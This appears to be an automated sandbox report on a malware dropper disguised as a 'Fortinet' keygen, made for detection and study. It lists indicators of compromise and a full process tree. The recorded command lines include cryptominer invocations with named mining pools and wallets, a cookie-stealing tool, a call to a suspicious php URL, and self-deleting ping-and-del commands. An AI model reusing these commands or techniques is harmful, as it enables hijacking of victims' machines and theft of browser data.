328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 4340 PING.EXE 2572 PING.EXE 6112 PING.EXE 1280 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 119 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 124 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 266 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 275 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2596 setups.tmp 2596 setups.tmp 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe 2476 Three.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 1492 Setup.exe Token: SeCreateTokenPrivilege 2956 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2956 askinstall20.exe Token: SeLockMemoryPrivilege 2956 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2956 askinstall20.exe Token: SeMachineAccountPrivilege 2956 askinstall20.exe Token: SeTcbPrivilege 2956 askinstall20.exe Token: SeSecurityPrivilege 2956 askinstall20.exe Token: SeTakeOwnershipPrivilege 2956 askinstall20.exe Token: SeLoadDriverPrivilege 2956 askinstall20.exe Token: SeSystemProfilePrivilege 2956 askinstall20.exe Token: SeSystemtimePrivilege 2956 askinstall20.exe Token: SeProfSingleProcessPrivilege 2956 askinstall20.exe Token: SeIncBasePriorityPrivilege 2956 askinstall20.exe Token: SeCreatePagefilePrivilege 2956 askinstall20.exe Token: SeCreatePermanentPrivilege 2956 askinstall20.exe Token: SeBackupPrivilege 2956 askinstall20.exe Token: SeRestorePrivilege 2956 askinstall20.exe Token: SeShutdownPrivilege 2956 askinstall20.exe Token: SeDebugPrivilege 2956 askinstall20.exe Token: SeAuditPrivilege 2956 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2956 askinstall20.exe Token: SeChangeNotifyPrivilege 2956 askinstall20.exe Token: SeRemoteShutdownPrivilege 2956 askinstall20.exe Token: SeUndockPrivilege 2956 askinstall20.exe Token: SeSyncAgentPrivilege 2956 askinstall20.exe Token: SeEnableDelegationPrivilege 2956 askinstall20.exe Token: SeManageVolumePrivilege 2956 askinstall20.exe Token: SeImpersonatePrivilege 2956 askinstall20.exe Token: SeCreateGlobalPrivilege 2956 askinstall20.exe Token: 31 2956 askinstall20.exe Token: 32 2956 askinstall20.exe Token: 33 2956 askinstall20.exe Token: 34 2956 askinstall20.exe Token: 35 2956 askinstall20.exe Token: SeDebugPrivilege 2476 multitimer.exe Token: SeDebugPrivilege 2156 taskkill.exe Token: SeDebugPrivilege 4796 MicrosoftEdge.exe Token: SeDebugPrivilege 4796 MicrosoftEdge.exe Token: SeDebugPrivilege 4796 MicrosoftEdge.exe Token: SeDebugPrivilege 4796 MicrosoftEdge.exe Token: SeDebugPrivilege 4412 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4412 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4412 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4412 MicrosoftEdgeCP.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2524 setups.exe 2596 setups.tmp 4796 MicrosoftEdge.exe 4388 MicrosoftEdgeCP.exe 4388 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 4652 wrote to memory of 4184 4652 Fortinet.v1.0.keygen.exe 78 PID 4652 wrote to memory of 4184 4652 Fortinet.v1.0.keygen.exe 78 PID 4652 wrote to memory of 4184 4652 Fortinet.v1.0.keygen.exe 78 PID 4184 wrote to memory of 3228 4184 cmd.exe 81 PID 4184 wrote to memory of 3228 4184 cmd.exe 81 PID 4184 wrote to memory of 3228 4184 cmd.exe 81 PID 4184 wrote to memory of 1872 4184 cmd.exe 82 PID 4184 wrote to memory of 1872 4184 cmd.exe 82 PID 4184 wrote to memory of 1872 4184 cmd.exe 82 PID 4184 wrote to memory of 4088 4184 cmd.exe 83 PID 4184 wrote to memory of 4088 4184 cmd.exe 83 PID 4184 wrote to memory of 4088 4184 cmd.exe 83 PID 4184 wrote to memory of 4436 4184 cmd.exe 84 PID 4184 wrote to memory of 4436 4184 cmd.exe 84 PID 4184 wrote to memory of 4436 4184 cmd.exe 84 PID 3228 wrote to memory of 1236 3228 keygen-pr.exe 85 PID 3228 wrote to memory of 1236 3228 keygen-pr.exe 85 PID 3228 wrote to memory of 1236 3228 keygen-pr.exe 85 PID 4436 wrote to memory of 1492 4436 keygen-step-4.exe 86 PID 4436 wrote to memory of 1492 4436 keygen-step-4.exe 86 PID 4088 wrote to memory of 1496 4088 keygen-step-3.exe 87 PID 4088 wrote to memory of 1496 4088 keygen-step-3.exe 87 PID 4088 wrote to memory of 1496 4088 keygen-step-3.exe 87 PID 1236 wrote to memory of 1960 1236 key.exe 89 PID 1236 wrote to memory of 1960 1236 key.exe 89 PID 1236 wrote to memory of 1960 1236 key.exe 89 PID 1496 wrote to memory of 1280 1496 cmd.exe 90 PID 1496 wrote to memory of 1280 1496 cmd.exe 90 PID 1496 wrote to memory of 1280 1496 cmd.exe 90 PID 1492 wrote to memory of 2476 1492 Setup.exe 91 PID 1492 wrote to memory of 2476 1492 Setup.exe 91 PID 1492 wrote to memory of 2524 1492 Setup.exe 92 PID 1492 wrote to memory of 2524 1492 Setup.exe 92 PID 1492 wrote to memory of 2524 1492 Setup.exe 92 PID 4436 wrote to memory of 2956 4436 keygen-step-4.exe 93 PID 4436 wrote to memory of 2956 4436 keygen-step-4.exe 93 PID 4436 wrote to memory of 2956 4436 keygen-step-4.exe 93 PID 2524 wrote to memory of 2596 2524 setups.exe 94 PID 2524 wrote to memory of 2596 2524 setups.exe 94 PID 2524 wrote to memory of 2596 2524 setups.exe 94 PID 2956 wrote to memory of 1316 2956 askinstall20.exe 96 PID 2956 wrote to memory of 1316 2956 askinstall20.exe 96 PID 2956 wrote to memory of 1316 2956 askinstall20.exe 96 PID 1316 wrote to memory of 2156 1316 cmd.exe 98 PID 1316 wrote to memory of 2156 1316 cmd.exe 98 PID 1316 wrote to memory of 2156 1316 cmd.exe 98 PID 4436 wrote to memory of 4460 4436 keygen-step-4.exe 104 PID 4436 wrote to memory of 4460 4436 keygen-step-4.exe 104 PID 4436 wrote to memory of 4460 4436 keygen-step-4.exe 104 PID 2476 wrote to memory of 4028 2476 Three.exe 105 PID 2476 wrote to memory of 4028 2476 Three.exe 105 PID 4460 wrote to memory of 1964 4460 Full Program Features.exe 106 PID 4460 wrote to memory of 1964 4460 Full Program Features.exe 106 PID 4460 wrote to memory of 1964 4460 Full Program Features.exe 106 PID 4028 wrote to memory of 1648 4028 multitimer.exe 107 PID 4028 wrote to memory of 1648 4028 multitimer.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fortinet.v1.0.keygen.exe"C:\Users\Admin\AppData\Local\Temp\Fortinet.v1.0.keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:1960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1872
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:1280
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\8HM9QH3MH1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8HM9QH3MH1\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\8HM9QH3MH1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8HM9QH3MH1\multitimer.exe" 1 3.1617397880.60678878e55ec 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\8HM9QH3MH1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8HM9QH3MH1\multitimer.exe" 2 3.1617397880.60678878e55ec7⤵
- Executes dropped EXE
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\030yg4juuvn\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\030yg4juuvn\KiffApp1.exe"8⤵PID:4128
-
-
C:\Users\Admin\AppData\Local\Temp\eg0zmnti1le\v0kznwelkxv.exe"C:\Users\Admin\AppData\Local\Temp\eg0zmnti1le\v0kznwelkxv.exe" /ustwo INSTALL8⤵PID:3244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 6529⤵
- Program crash
PID:1484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 6649⤵
- Program crash
PID:5256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 6369⤵
- Program crash
PID:5504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 6329⤵
- Program crash
PID:5596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 8929⤵
- Program crash
PID:5828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 7489⤵
- Program crash
PID:5956
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 9809⤵
- Program crash
PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\nvgotki2mfl\vpn.exe"C:\Users\Admin\AppData\Local\Temp\nvgotki2mfl\vpn.exe" /silent /subid=4828⤵PID:1492
-
C:\Users\Admin\AppData\Local\Temp\is-GSOAS.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-GSOAS.tmp\vpn.tmp" /SL5="$302F4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\nvgotki2mfl\vpn.exe" /silent /subid=4829⤵PID:5104
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:1616
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:4848
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:1860
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:3564
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:7480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qgfitflgk4w\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\qgfitflgk4w\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:3308
-
C:\Users\Admin\AppData\Local\Temp\is-0BFIF.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-0BFIF.tmp\IBInstaller_97039.tmp" /SL5="$303B6,12322324,721408,C:\Users\Admin\AppData\Local\Temp\qgfitflgk4w\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:1900
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:808
-
-
C:\Users\Admin\AppData\Local\Temp\is-L10QD.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-L10QD.tmp\{app}\chrome_proxy.exe"10⤵PID:4224
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-L10QD.tmp\{app}\chrome_proxy.exe"11⤵PID:6064
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:6112
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gcrdjvzg1bx\3n4k2d2hr0v.exe"C:\Users\Admin\AppData\Local\Temp\gcrdjvzg1bx\3n4k2d2hr0v.exe"8⤵PID:2464
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\gcrdjvzg1bx\3n4k2d2hr0v.exe"9⤵PID:1488
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fbq1mfhx2px\arfhcefs04r.exe"C:\Users\Admin\AppData\Local\Temp\fbq1mfhx2px\arfhcefs04r.exe" /quiet SILENT=1 AF=7568⤵PID:3956
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fbq1mfhx2px\arfhcefs04r.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fbq1mfhx2px\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617138371 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5360
-
-
-
C:\Users\Admin\AppData\Local\Temp\p5cd5v5rcaf\aggc3hme5i5.exe"C:\Users\Admin\AppData\Local\Temp\p5cd5v5rcaf\aggc3hme5i5.exe" /VERYSILENT8⤵PID:4364
-
-
C:\Users\Admin\AppData\Local\Temp\0j5h03bgkcy\app.exe"C:\Users\Admin\AppData\Local\Temp\0j5h03bgkcy\app.exe" /8-238⤵PID:1504
-
C:\Users\Admin\AppData\Local\Temp\0j5h03bgkcy\app.exe"C:\Users\Admin\AppData\Local\Temp\0j5h03bgkcy\app.exe" /8-239⤵PID:7580
-
-
-
C:\Users\Admin\AppData\Local\Temp\nlwpvfybmhu\vict.exe"C:\Users\Admin\AppData\Local\Temp\nlwpvfybmhu\vict.exe" /VERYSILENT /id=5358⤵PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\kqpefdnfkkt\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\kqpefdnfkkt\cpyrix.exe" /VERYSILENT8⤵PID:4432
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5688
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:5848
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5780
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:5264
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:6136
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:4608
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1zodaemhbzh\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\1zodaemhbzh\Setup3310.exe" /Verysilent /subid=5778⤵PID:4240
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\T5EA18TD5E\setups.exe"C:\Users\Admin\AppData\Local\Temp\T5EA18TD5E\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\is-H4APK.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-H4APK.tmp\setups.tmp" /SL5="$40112,635399,250368,C:\Users\Admin\AppData\Local\Temp\T5EA18TD5E\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:1964
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:2376
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4684
-
C:\Users\Admin\AppData\Roaming\9197.tmp.exe"C:\Users\Admin\AppData\Roaming\9197.tmp.exe"5⤵PID:4620
-
C:\Users\Admin\AppData\Roaming\9197.tmp.exe"C:\Users\Admin\AppData\Roaming\9197.tmp.exe"6⤵PID:3396
-
-
-
C:\Users\Admin\AppData\Roaming\92B1.tmp.exe"C:\Users\Admin\AppData\Roaming\92B1.tmp.exe"5⤵PID:1860
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4704
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:756
-
-
-
C:\Users\Admin\AppData\Roaming\937D.tmp.exe"C:\Users\Admin\AppData\Roaming\937D.tmp.exe"5⤵PID:2560
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\937D.tmp.exe6⤵PID:4236
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4472
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:4288
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:2572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:3456
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4796
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3460
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4388
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\is-9QTAI.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-9QTAI.tmp\Setup3310.tmp" /SL5="$801E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\1zodaemhbzh\Setup3310.exe" /Verysilent /subid=5771⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\is-TTT80.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TTT80.tmp\Setup.exe" /Verysilent2⤵PID:5976
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:5576
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5984
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:5608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 9484⤵
- Program crash
PID:6936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 10044⤵
- Program crash
PID:6328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 10124⤵
- Program crash
PID:6508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 11484⤵
- Program crash
PID:6664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 11884⤵
- Program crash
PID:6956
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 12204⤵
- Program crash
PID:5568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 15364⤵
- Program crash
PID:6304
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 15564⤵
- Program crash
PID:6576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 17764⤵
- Program crash
PID:7084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 17964⤵
- Program crash
PID:6736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 17764⤵
- Program crash
PID:5300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 15484⤵
- Program crash
PID:7176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 17484⤵
- Program crash
PID:6392
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:5636
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\is-B9LPH.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-B9LPH.tmp\LabPicV3.tmp" /SL5="$30252,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:636
-
C:\Users\Admin\AppData\Local\Temp\is-31V00.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-31V00.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:4600
-
C:\Program Files\MSBuild\WOMZOKKSQE\prolab.exe"C:\Program Files\MSBuild\WOMZOKKSQE\prolab.exe" /VERYSILENT6⤵PID:764
-
C:\Users\Admin\AppData\Local\Temp\is-0FUFS.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-0FUFS.tmp\prolab.tmp" /SL5="$203C8,575243,216576,C:\Program Files\MSBuild\WOMZOKKSQE\prolab.exe" /VERYSILENT7⤵PID:2200
-
-
-
C:\Users\Admin\AppData\Local\Temp\17-4a59c-c1e-cb1be-bcb17b4546606\Fulodilaeky.exe"C:\Users\Admin\AppData\Local\Temp\17-4a59c-c1e-cb1be-bcb17b4546606\Fulodilaeky.exe"6⤵PID:6020
-
-
C:\Users\Admin\AppData\Local\Temp\14-3019a-4dc-d7282-656c5dbb3b1d5\Beqeshumaqi.exe"C:\Users\Admin\AppData\Local\Temp\14-3019a-4dc-d7282-656c5dbb3b1d5\Beqeshumaqi.exe"6⤵PID:5380
-
